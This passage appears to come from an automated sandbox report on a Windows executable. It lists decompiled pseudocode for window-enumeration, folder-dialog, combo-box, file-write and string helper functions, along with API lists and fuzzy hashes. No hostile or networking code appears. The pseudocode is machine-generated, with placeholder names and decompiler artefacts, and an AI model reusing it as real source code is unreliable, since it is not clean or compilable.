                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                  • String ID: caption
                                                                                                  • API String ID: 1523050162-4135340389
                                                                                                  • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                  • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                  • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                  • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                  				struct HINSTANCE__* _t11;
                                                                                                  				struct HINSTANCE__** _t14;
                                                                                                  				struct HINSTANCE__* _t15;
                                                                                                  
                                                                                                  				_t14 = __eax;
                                                                                                  				if( *((intOrPtr*)(__eax)) == 0) {
                                                                                                  					_t11 = E00405436(L"winsta.dll");
                                                                                                  					 *_t14 = _t11;
                                                                                                  					if(_t11 != 0) {
                                                                                                  						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t15 = _t14[1];
                                                                                                  				if(_t15 == 0) {
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
                                                                                                  				}
                                                                                                  			}






                                                                                                  0x00409a4a
                                                                                                  0x00409a4f
                                                                                                  0x00409a56
                                                                                                  0x00409a5e
                                                                                                  0x00409a60
                                                                                                  0x00409a6e
                                                                                                  0x00409a6e
                                                                                                  0x00409a60
                                                                                                  0x00409a71
                                                                                                  0x00409a76
                                                                                                  0x00000000
                                                                                                  0x00409a78
                                                                                                  0x00000000
                                                                                                  0x00409a89

                                                                                                  APIs
                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                  • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                  • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                  • API String ID: 946536540-379566740
                                                                                                  • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                  • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                  • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                  • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 93%
                                                                                                  			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                  				signed int _t21;
                                                                                                  				signed int _t23;
                                                                                                  				void* _t24;
                                                                                                  				signed int _t31;
                                                                                                  				void* _t33;
                                                                                                  				void* _t44;
                                                                                                  				signed int _t46;
                                                                                                  				void* _t48;
                                                                                                  				signed int _t51;
                                                                                                  				int _t52;
                                                                                                  				void** _t53;
                                                                                                  				void* _t58;
                                                                                                  
                                                                                                  				_t53 = __esi;
                                                                                                  				_t1 =  &(_t53[1]); // 0x0
                                                                                                  				_t51 =  *_t1;
                                                                                                  				_t21 = 0;
                                                                                                  				if(_t51 <= 0) {
                                                                                                  					L4:
                                                                                                  					_t2 =  &(_t53[2]); // 0x8
                                                                                                  					_t33 =  *_t53;
                                                                                                  					_t23 =  *_t2 + _t51;
                                                                                                  					_t46 = 8;
                                                                                                  					_t53[1] = _t23;
                                                                                                  					_t24 = _t23 * _t46;
                                                                                                  					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                                  					L0040B26C();
                                                                                                  					_t10 =  &(_t53[1]); // 0x0
                                                                                                  					 *_t53 = _t24;
                                                                                                  					memset(_t24, 0,  *_t10 << 3);
                                                                                                  					_t52 = _t51 << 3;
                                                                                                  					memcpy( *_t53, _t33, _t52);
                                                                                                  					if(_t33 != 0) {
                                                                                                  						_push(_t33);
                                                                                                  						L0040B272();
                                                                                                  					}
                                                                                                  					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                                  					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                                  				} else {
                                                                                                  					_t44 =  *__esi;
                                                                                                  					_t48 = _t44;
                                                                                                  					while( *_t48 != 0) {
                                                                                                  						_t21 = _t21 + 1;
                                                                                                  						_t48 = _t48 + 8;
                                                                                                  						_t58 = _t21 - _t51;
                                                                                                  						if(_t58 < 0) {
                                                                                                  							continue;
                                                                                                  						} else {
                                                                                                  							goto L4;
                                                                                                  						}
                                                                                                  						goto L7;
                                                                                                  					}
                                                                                                  					_t31 = _t21 << 3;
                                                                                                  					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                                  					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                                  				}
                                                                                                  				L7:
                                                                                                  				return 1;
                                                                                                  			}















                                                                                                  0x0040588e
                                                                                                  0x0040588f
                                                                                                  0x0040588f
                                                                                                  0x00405892
                                                                                                  0x00405896
                                                                                                  0x004058a9
                                                                                                  0x004058a9
                                                                                                  0x004058ad
                                                                                                  0x004058af
                                                                                                  0x004058b5
                                                                                                  0x004058b6
                                                                                                  0x004058b9
                                                                                                  0x004058c2
                                                                                                  0x004058c3
                                                                                                  0x004058c8
                                                                                                  0x004058d2
                                                                                                  0x004058d4
                                                                                                  0x004058d9
                                                                                                  0x004058e0
                                                                                                  0x004058ea
                                                                                                  0x004058ec
                                                                                                  0x004058ed
                                                                                                  0x004058f2
                                                                                                  0x004058f9
                                                                                                  0x00405902
                                                                                                  0x00405898
                                                                                                  0x00405898
                                                                                                  0x0040589a
                                                                                                  0x0040589c
                                                                                                  0x004058a1
                                                                                                  0x004058a2
                                                                                                  0x004058a5
                                                                                                  0x004058a7
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004058a7
                                                                                                  0x00405912
                                                                                                  0x00405915
                                                                                                  0x0040591e
                                                                                                  0x0040591e
                                                                                                  0x00405907
                                                                                                  0x0040590b

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1865533344-0
                                                                                                  • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                  • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                  • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                  • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 37%
                                                                                                  			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
                                                                                                  				void* _v8;
                                                                                                  				wchar_t* _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				intOrPtr _v24;
                                                                                                  				intOrPtr _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				intOrPtr _v36;
                                                                                                  				char _v40;
                                                                                                  				long _v564;
                                                                                                  				char* _t18;
                                                                                                  				char* _t22;
                                                                                                  				wchar_t* _t23;
                                                                                                  				intOrPtr* _t24;
                                                                                                  				intOrPtr* _t26;
                                                                                                  				intOrPtr _t30;
                                                                                                  				void* _t35;
                                                                                                  				char* _t36;
                                                                                                  
                                                                                                  				_t18 =  &_v8;
                                                                                                  				_t30 = 0;
                                                                                                  				__imp__SHGetMalloc(_t18);
                                                                                                  				if(_t18 >= 0) {
                                                                                                  					_v40 = _a4;
                                                                                                  					_v28 = _a8;
                                                                                                  					_t22 =  &_v40;
                                                                                                  					_v36 = 0;
                                                                                                  					_v32 = 0;
                                                                                                  					_v24 = 4;
                                                                                                  					_v20 = E0040AC81;
                                                                                                  					_v16 = __esi;
                                                                                                  					__imp__SHBrowseForFolderW(_t22, _t35);
                                                                                                  					_t36 = _t22;
                                                                                                  					if(_t36 != 0) {
                                                                                                  						_t23 =  &_v564;
                                                                                                  						__imp__SHGetPathFromIDListW(_t36, _t23);
                                                                                                  						if(_t23 != 0) {
                                                                                                  							_t30 = 1;
                                                                                                  							wcscpy(__esi,  &_v564);
                                                                                                  						}
                                                                                                  						_t24 = _v8;
                                                                                                  						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                                                                  						_t26 = _v8;
                                                                                                  						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t30;
                                                                                                  			}




















                                                                                                  0x0040ad06
                                                                                                  0x0040ad0a
                                                                                                  0x0040ad0c
                                                                                                  0x0040ad14
                                                                                                  0x0040ad19
                                                                                                  0x0040ad1f
                                                                                                  0x0040ad23
                                                                                                  0x0040ad27
                                                                                                  0x0040ad2a
                                                                                                  0x0040ad2d
                                                                                                  0x0040ad34
                                                                                                  0x0040ad3b
                                                                                                  0x0040ad3e
                                                                                                  0x0040ad44
                                                                                                  0x0040ad48
                                                                                                  0x0040ad4a
                                                                                                  0x0040ad52
                                                                                                  0x0040ad5a
                                                                                                  0x0040ad64
                                                                                                  0x0040ad65
                                                                                                  0x0040ad6b
                                                                                                  0x0040ad6c
                                                                                                  0x0040ad73
                                                                                                  0x0040ad76
                                                                                                  0x0040ad7c
                                                                                                  0x0040ad7c
                                                                                                  0x0040ad7f
                                                                                                  0x0040ad84

                                                                                                  APIs
                                                                                                  • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                  • wcscpy.MSVCRT ref: 0040AD65
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3917621476-0
                                                                                                  • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                  • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                  • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                  • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                  				long _v8;
                                                                                                  				long _v12;
                                                                                                  				long _t13;
                                                                                                  				void* _t14;
                                                                                                  				struct HWND__* _t24;
                                                                                                  
                                                                                                  				_t24 = GetDlgItem(_a4, _a8);
                                                                                                  				_t13 = SendMessageW(_t24, 0x146, 0, 0);
                                                                                                  				_v12 = _t13;
                                                                                                  				_v8 = 0;
                                                                                                  				if(_t13 <= 0) {
                                                                                                  					L3:
                                                                                                  					_t14 = 0;
                                                                                                  				} else {
                                                                                                  					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
                                                                                                  						_v8 = _v8 + 1;
                                                                                                  						if(_v8 < _v12) {
                                                                                                  							continue;
                                                                                                  						} else {
                                                                                                  							goto L3;
                                                                                                  						}
                                                                                                  						goto L4;
                                                                                                  					}
                                                                                                  					SendMessageW(_t24, 0x14e, _v8, 0);
                                                                                                  					_t14 = 1;
                                                                                                  				}
                                                                                                  				L4:
                                                                                                  				return _t14;
                                                                                                  			}








                                                                                                  0x00404a62
                                                                                                  0x00404a6a
                                                                                                  0x00404a6e
                                                                                                  0x00404a71
                                                                                                  0x00404a74
                                                                                                  0x00404a92
                                                                                                  0x00404a92
                                                                                                  0x00404a76
                                                                                                  0x00404a76
                                                                                                  0x00404a87
                                                                                                  0x00404a90
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00404a90
                                                                                                  0x00404aa3
                                                                                                  0x00404aa7
                                                                                                  0x00404aa7
                                                                                                  0x00404a94
                                                                                                  0x00404a98

                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32 ref: 00404A52
                                                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Item
                                                                                                  • String ID:
                                                                                                  • API String ID: 3888421826-0
                                                                                                  • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                  • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                  • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                  • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 93%
                                                                                                  			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                                  				long _v8;
                                                                                                  				void _v8199;
                                                                                                  				char _v8200;
                                                                                                  
                                                                                                  				E0040B550(0x2004, __ecx);
                                                                                                  				_v8200 = 0;
                                                                                                  				memset( &_v8199, 0, 0x1fff);
                                                                                                  				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                                  				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                                  			}






                                                                                                  0x004072e0
                                                                                                  0x004072f7
                                                                                                  0x004072fd
                                                                                                  0x00407316
                                                                                                  0x00407342

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004072FD
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                  • strlen.MSVCRT ref: 00407328
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2754987064-0
                                                                                                  • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                  • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                  • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                  • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00408DC8(void** __eax, struct HWND__* _a4) {
                                                                                                  				int _t7;
                                                                                                  				void** _t11;
                                                                                                  
                                                                                                  				_t11 = __eax;
                                                                                                  				if( *0x4101b4 == 0) {
                                                                                                  					memcpy(0x40f5c8,  *__eax, 0x50);
                                                                                                  					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
                                                                                                  					 *0x4101b4 = 1;
                                                                                                  					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
                                                                                                  					 *0x4101b4 =  *0x4101b4 & 0x00000000;
                                                                                                  					 *0x40f2f4 = _t7;
                                                                                                  					return 1;
                                                                                                  				} else {
                                                                                                  					return 1;
                                                                                                  				}
                                                                                                  			}





                                                                                                  0x00408dd0
                                                                                                  0x00408dd2
                                                                                                  0x00408de2
                                                                                                  0x00408df4
                                                                                                  0x00408e01
                                                                                                  0x00408e1b
                                                                                                  0x00408e21
                                                                                                  0x00408e28
                                                                                                  0x00408e30
                                                                                                  0x00408dd4
                                                                                                  0x00408dd8
                                                                                                  0x00408dd8

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                                  • String ID:
                                                                                                  • API String ID: 1386444988-0
                                                                                                  • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                  • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                  • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                  • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004050E1(wchar_t* __edi, wchar_t* _a4) {
                                                                                                  				int _t10;
                                                                                                  				int _t12;
                                                                                                  				void* _t23;
                                                                                                  				wchar_t* _t24;
                                                                                                  				signed int _t25;
                                                                                                  
                                                                                                  				_t24 = __edi;
                                                                                                  				_t25 = wcslen(__edi);
                                                                                                  				_t10 = wcslen(_a4);
                                                                                                  				_t23 = _t10 + _t25;
                                                                                                  				if(_t23 >= 0x3ff) {
                                                                                                  					_t12 = _t10 - _t23 + 0x3ff;
                                                                                                  					if(_t12 > 0) {
                                                                                                  						wcsncat(__edi + _t25 * 2, _a4, _t12);
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					wcscat(__edi + _t25 * 2, _a4);
                                                                                                  				}
                                                                                                  				return _t24;
                                                                                                  			}








                                                                                                  0x004050e1
                                                                                                  0x004050ec
                                                                                                  0x004050ee
                                                                                                  0x004050f5
                                                                                                  0x004050ff
                                                                                                  0x00405114
                                                                                                  0x00405118
                                                                                                  0x00405123
                                                                                                  0x00405128
                                                                                                  0x00405101
                                                                                                  0x00405109
                                                                                                  0x0040510f
                                                                                                  0x0040512e

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcslen$wcscatwcsncat
                                                                                                  • String ID:
                                                                                                  • API String ID: 291873006-0
                                                                                                  • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                  • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                  • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                  • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00402DDD(struct HWND__* __eax, void* __ecx) {
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				struct HWND__* _t11;
                                                                                                  				struct HWND__* _t14;
                                                                                                  				struct HWND__* _t15;
                                                                                                  				void* _t16;
                                                                                                  
                                                                                                  				_t14 = __eax;
                                                                                                  				_t16 = __ecx;
                                                                                                  				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
                                                                                                  				GetClientRect(__eax, __ecx + 0xa14);
                                                                                                  				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
                                                                                                  				_t15 = GetWindow(GetWindow(_t14, 5), 0);
                                                                                                  				do {
                                                                                                  					E00402D99(_t15, _t16);
                                                                                                  					_t11 = GetWindow(_t15, 2);
                                                                                                  					_t15 = _t11;
                                                                                                  				} while (_t15 != 0);
                                                                                                  				return _t11;
                                                                                                  			}









                                                                                                  0x00402de0
                                                                                                  0x00402de2
                                                                                                  0x00402dec
                                                                                                  0x00402def
                                                                                                  0x00402dfb
                                                                                                  0x00402e0c
                                                                                                  0x00402e0e
                                                                                                  0x00402e0e
                                                                                                  0x00402e16
                                                                                                  0x00402e18
                                                                                                  0x00402e1a
                                                                                                  0x00402e21

                                                                                                  APIs
                                                                                                  • GetClientRect.USER32 ref: 00402DEF
                                                                                                  • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                  • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                    • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                    • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Window$Rect$ClientPoints
                                                                                                  • String ID:
                                                                                                  • API String ID: 4235085887-0
                                                                                                  • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                  • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                  • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                  • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 72%
                                                                                                  			E0040B6A6() {
                                                                                                  				intOrPtr _t1;
                                                                                                  				intOrPtr _t2;
                                                                                                  				intOrPtr _t3;
                                                                                                  				intOrPtr _t4;
                                                                                                  
                                                                                                  				_t1 =  *0x41c458;
                                                                                                  				if(_t1 != 0) {
                                                                                                  					_push(_t1);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t2 =  *0x41c460;
                                                                                                  				if(_t2 != 0) {
                                                                                                  					_push(_t2);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t3 =  *0x41c45c;
                                                                                                  				if(_t3 != 0) {
                                                                                                  					_push(_t3);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t4 =  *0x41c464;
                                                                                                  				if(_t4 != 0) {
                                                                                                  					_push(_t4);
                                                                                                  					L0040B272();
                                                                                                  					return _t4;
                                                                                                  				}
                                                                                                  				return _t4;
                                                                                                  			}







                                                                                                  0x0040b6a6
                                                                                                  0x0040b6ad
                                                                                                  0x0040b6af
                                                                                                  0x0040b6b0
                                                                                                  0x0040b6b5
                                                                                                  0x0040b6b6
                                                                                                  0x0040b6bd
                                                                                                  0x0040b6bf
                                                                                                  0x0040b6c0
                                                                                                  0x0040b6c5
                                                                                                  0x0040b6c6
                                                                                                  0x0040b6cd
                                                                                                  0x0040b6cf
                                                                                                  0x0040b6d0
                                                                                                  0x0040b6d5
                                                                                                  0x0040b6d6
                                                                                                  0x0040b6dd
                                                                                                  0x0040b6df
                                                                                                  0x0040b6e0
                                                                                                  0x00000000
                                                                                                  0x0040b6e5
                                                                                                  0x0040b6e6

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 613200358-0
                                                                                                  • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                  • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                  • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                  • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

